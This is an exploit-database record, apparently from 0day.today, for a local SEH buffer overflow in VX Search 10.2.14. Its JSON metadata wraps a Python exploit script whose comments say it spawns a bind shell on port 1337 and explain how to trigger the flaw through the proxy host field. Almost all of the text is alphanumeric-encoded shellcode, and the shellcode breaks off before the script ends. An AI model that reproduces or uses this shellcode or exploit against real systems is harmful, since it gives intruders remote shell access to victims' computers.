Description
Exploit for the Windows platform, in the local exploits category
{"id": "1337DAY-ID-29014", "type": "zdt", "bulletinFamily": "exploit", "title": "VX Search 10.2.14 - Proxy Buffer Overflow (SEH) Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2017-11-17T00:00:00", "modified": "2017-11-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/29014", "reporter": "wetw0rk", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-01-09T17:20:28", "viewCount": 10, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "threatpost", "idList": ["THREATPOST:5D5241707AB76ED799696E37D048872A", "THREATPOST:7876640D5EC3E8FE3FE885606BBB1C6D"]}]}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/29014", "sourceData": "#!/usr/bin/env python\r\n#\r\n# Exploit Title : VXSearch v10.2.14 Local SEH Overflow\r\n# Date : 11/16/2017\r\n# Exploit Author : wetw0rk\r\n# Vendor Homepage : http://www.flexense.com/\r\n# Software link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe\r\n# Version : 10.2.14\r\n# Tested on : Windows 7 (x86)\r\n# Description : VX Search v10.2.14 suffers from a local buffer overflow. The\r\n# following exploit will generate a bind shell on port 1337. I\r\n# was unable to get a shell working with msfvenom shellcode so\r\n# below is a custom alphanumeric bind shell. 
Greetz rezkon ;)\r\n#\r\n# trigger the vulnerability by :\r\n# Tools -> Advanced options -> Proxy -> *Paste In Proxy Host Name\r\n#\r\n \r\nimport struct\r\n \r\nshellcode = \"w00tw00t\"\r\nshellcode += (\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\" # and eax, 0x554e4d4a\r\n\"\\x25\\x35\\x32\\x31\\x2a\" # and eax, 0x2a313235\r\n\"\\x2d\\x6a\\x35\\x35\\x35\" # sub eax, 0x3535356a\r\n\"\\x2d\\x65\\x6a\\x6a\\x65\" # sub eax, 0x656a6a65\r\n\"\\x2d\\x61\\x64\\x4d\\x65\" # sub eax, 0x654d6461\r\n\"\\x50\" # push eax\r\n\"\\x5c\" # pop esp\r\n)\r\nshellcode += (\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4f\\x4f\\x4f\\x4f\"\r\n\"\\x2d\\x4f\\x30\\x4f\\x68\\x2d\\x62\\x2d\\x62\\x72\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x76\\x57\\x57\\x63\\x2d\\x77\\x36\\x39\"\r\n\"\\x32\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\\x54\"\r\n\"\\x54\\x54\\x2d\\x25\\x54\\x7a\\x2d\\x2d\\x25\\x52\\x76\\x36\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x49\\x35\\x49\\x49\\x2d\\x49\"\r\n\"\\x25\\x49\\x69\\x2d\\x64\\x25\\x72\\x6c\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x70\\x33\\x33\\x25\\x2d\\x70\\x25\\x70\\x25\\x2d\"\r\n\"\\x4b\\x6a\\x56\\x39\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x79\\x55\\x75\\x32\\x2d\\x79\\x75\\x75\\x55\\x2d\\x79\\x77\\x77\\x78\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x4a\\x4a\"\r\n\"\\x25\\x2d\\x39\\x5f\\x4d\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x4b\\x57\\x4b\\x57\\x2d\\x70\\x76\\x4b\\x79\\x2d\\x70\\x76\"\r\n\"\\x78\\x79\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x49\"\r\n\"\\x49\\x49\\x49\\x2d\\x49\\x4e\\x64\\x49\\x2d\\x78\\x25\\x78\\x25\\x2d\\x6f\"\r\n\"\\x25\\x7a\\x48\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x58\\x58\\x38\\x58\\x2d\\x58\\x30\\x32\\x58\\x2d\\x51\\x46\\x2d\\x47\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x3
5\\x32\\x31\\x2a\\x2d\\x5f\\x52\\x5f\\x5f\"\r\n\"\\x2d\\x5f\\x25\\x25\\x35\\x2d\\x62\\x39\\x25\\x25\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4a\\x4a\\x4a\\x4a\\x2d\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x2d\\x79\\x39\\x4a\\x79\\x2d\\x6d\\x32\\x4b\\x68\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x30\\x30\\x71\\x30\\x2d\\x30\\x25\"\r\n\"\\x71\\x30\\x2d\\x38\\x31\\x51\\x5f\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x32\\x32\\x32\\x32\\x2d\\x78\\x77\\x7a\\x77\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x62\\x62\\x62\\x62\\x2d\"\r\n\"\\x48\\x57\\x47\\x4f\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x76\\x76\\x4f\\x4f\\x2d\\x36\\x39\\x5a\\x5a\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x61\\x61\\x61\\x61\\x2d\\x4a\\x61\\x4a\"\r\n\"\\x25\\x2d\\x45\\x77\\x53\\x35\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x63\\x63\\x63\\x63\\x2d\\x39\\x63\\x63\\x2d\\x2d\\x32\\x63\"\r\n\"\\x7a\\x25\\x2d\\x31\\x49\\x7a\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x72\\x79\\x79\\x79\\x2d\\x25\\x30\\x25\\x30\\x2d\\x25\"\r\n\"\\x32\\x25\\x55\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x58\\x58\\x41\\x58\\x2d\\x58\\x58\\x25\\x77\\x2d\\x6e\\x51\\x32\\x69\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x48\\x77\\x38\\x48\"\r\n\"\\x2d\\x4e\\x76\\x6e\\x61\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x41\\x41\\x6e\\x6e\\x2d\\x31\\x31\\x30\\x6e\\x2d\\x37\\x36\\x30\"\r\n\"\\x2d\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x38\\x38\"\r\n\"\\x38\\x38\\x2d\\x38\\x79\\x38\\x25\\x2d\\x38\\x79\\x38\\x25\\x2d\\x58\\x4c\"\r\n\"\\x73\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x61\"\r\n\"\\x52\\x61\\x52\\x2d\\x37\\x4a\\x31\\x49\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x4d\\x47\\x4d\\
x4d\\x2d\\x30\\x25\\x4d\\x6b\\x2d\"\r\n\"\\x36\\x32\\x66\\x71\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x36\\x43\\x43\\x6c\\x2d\\x33\\x54\\x47\\x25\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4c\\x4c\\x4c\\x4c\\x2d\\x6e\\x4c\\x6e\"\r\n\"\\x36\\x2d\\x65\\x67\\x6f\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x25\\x25\\x4b\\x4b\\x2d\\x25\\x25\\x6f\\x4b\\x2d\\x4e\\x41\"\r\n\"\\x59\\x2d\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\"\r\n\"\\x41\\x41\\x41\\x2d\\x52\\x52\\x78\\x41\\x2d\\x6e\\x6c\\x70\\x25\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x30\\x6c\\x30\\x30\\x2d\"\r\n\"\\x30\\x6c\\x6c\\x30\\x2d\\x38\\x70\\x79\\x66\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x42\\x70\\x70\\x45\\x2d\\x32\\x45\\x70\\x31\"\r\n\"\\x2d\\x25\\x4b\\x49\\x31\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x25\\x50\\x50\\x50\\x2d\\x25\\x7a\\x72\\x25\\x2d\\x4e\\x73\\x61\"\r\n\"\\x52\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x35\\x77\"\r\n\"\\x74\\x74\\x2d\\x61\\x78\\x35\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x30\\x30\\x30\\x30\\x2d\\x30\\x30\\x59\\x30\\x2d\\x30\"\r\n\"\\x30\\x74\\x51\\x2d\\x6b\\x36\\x79\\x67\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\"\r\n\"\\x35\\x32\\x31\\x2a\\x2d\\x75\\x38\\x43\\x43\\x2d\\x7a\\x31\\x43\\x43\\x2d\"\r\n\"\\x7a\\x2d\\x77\\x79\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x59\\x59\\x59\\x59\\x2d\\x59\\x59\\x59\\x59\\x2d\\x6f\\x6c\\x4d\\x77\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x45\\x45\\x45\"\r\n\"\\x45\\x2d\\x34\\x2d\\x76\\x45\\x2d\\x37\\x25\\x5a\\x65\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x34\\x34\\x34\\x34\\x2d\\x62\\x34\"\r\n\"\\x34\\x34\\x2d\\x6d\\x56\\x47\\x57\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\"\r\n\"\\x32\\x31\\x2a\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x76
\\x2d\\x2d\\x76\\x2d\\x55\"\r\n\"\\x4c\\x55\\x7a\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\"\r\n\"\\x77\\x77\\x77\\x30\\x2d\\x47\\x47\\x79\\x30\\x2d\\x42\\x42\\x39\\x34\\x50\"\r\n\"\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x56\\x75\\x36\\x51\"\r\n\"\\x2d\\x42\\x61\\x49\\x43\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x56\\x56\\x31\\x56\\x2d\\x31\\x79\\x31\\x25\\x2d\\x50\\x6c\\x48\"\r\n\"\\x34\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x72\\x72\"\r\n\"\\x72\\x72\\x2d\\x72\\x25\\x38\\x38\\x2d\\x38\\x25\\x25\\x25\\x2d\\x54\\x41\"\r\n\"\\x30\\x30\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x47\"\r\n\"\\x47\\x47\\x76\\x2d\\x47\\x47\\x76\\x76\\x2d\\x6b\\x72\\x6c\\x5a\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x25\\x71\\x25\\x71\\x2d\"\r\n\"\\x73\\x42\\x63\\x68\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\"\r\n\"\\x2d\\x48\\x55\\x51\\x51\\x2d\\x45\\x78\\x4f\\x5a\\x50\\x25\\x4a\\x4d\\x4e\"\r\n\"\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x45\\x45\\x45\\x32\\x2d\\x45\\x45\\x25\"\r\n\"\\x31\\x2d\\x76\\x75\\x2d\\x25\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\"\r\n\"\\x31\\x2a\\x2d\\x6e\\x4f\\x6d\\x6e\\x2d\\x35\\x48\\x5f\\x5f\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x2d\\x2d\\x2d\\x2d\\x2d\\x71\"\r\n\"\\x2d\\x2d\\x71\\x2d\\x71\\x2d\\x4a\\x71\\x2d\\x66\\x65\\x70\\x62\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x56\\x30\\x56\\x30\\x2d\"\r\n\"\\x56\\x38\\x25\\x30\\x2d\\x74\\x37\\x25\\x45\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x32\\x32\\x32\\x77\\x2d\\x32\\x32\\x32\\x32\"\r\n\"\\x2d\\x43\\x41\\x4a\\x57\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\"\r\n\"\\x2a\\x2d\\x63\\x63\\x63\\x30\\x2d\\x79\\x41\\x41\\x6e\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x4b\\x4b\\x4b\\x4b\\x2d\\x4b\\x4b\"\r\n\"\\x25\\x31\\x2d\\x4b\\x71\\x25\\x32\\x2d\\x4f\\x6e\\x25\\x
2d\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x37\\x37\\x37\\x37\\x2d\\x6d\"\r\n\"\\x37\\x6d\\x37\\x2d\\x6d\\x37\\x6d\\x37\\x2d\\x64\\x55\\x63\\x58\\x50\\x25\"\r\n\"\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x44\\x6c\\x6c\\x6c\\x2d\"\r\n\"\\x34\\x44\\x44\\x6c\\x2d\\x30\\x33\\x4e\\x54\\x50\\x25\\x4a\\x4d\\x4e\\x55\"\r\n\"\\x25\\x35\\x32\\x31\\x2a\\x2d\\x2d\\x7a\\x43\\x2d\\x2d\\x48\\x79\\x71\\x47\"\r\n\"\\x50\\x25\\x4a\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x41\\x41\\x41\"\r\n\"\\x41\\x2d\\x41\\x46\\x71\\x25\\x2d\\x5a\\x77\\x7a\\x32\\x50\\x25\\x4a\\x4d\"\r\n\"\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x47\\x47\\x47\\x47\\x2d\\x47\\x6e\"\r\n\"\\x47\\x6e\\x2d\\x47\\x78\\x6e\\x78\\x2d\\x47\\x79\\x77\\x79\\x50\\x25\\x4a\"\r\n\"\\x4d\\x4e\\x55\\x25\\x35\\x32\\x31\\x2a\\x2d\\x74\\x38\\x69\\x38\\x2d\\x51\"\n\n# 0day.today [2018-01-09] #", "_state": {"dependencies": 1647589307, "score": 1659729680}}
{}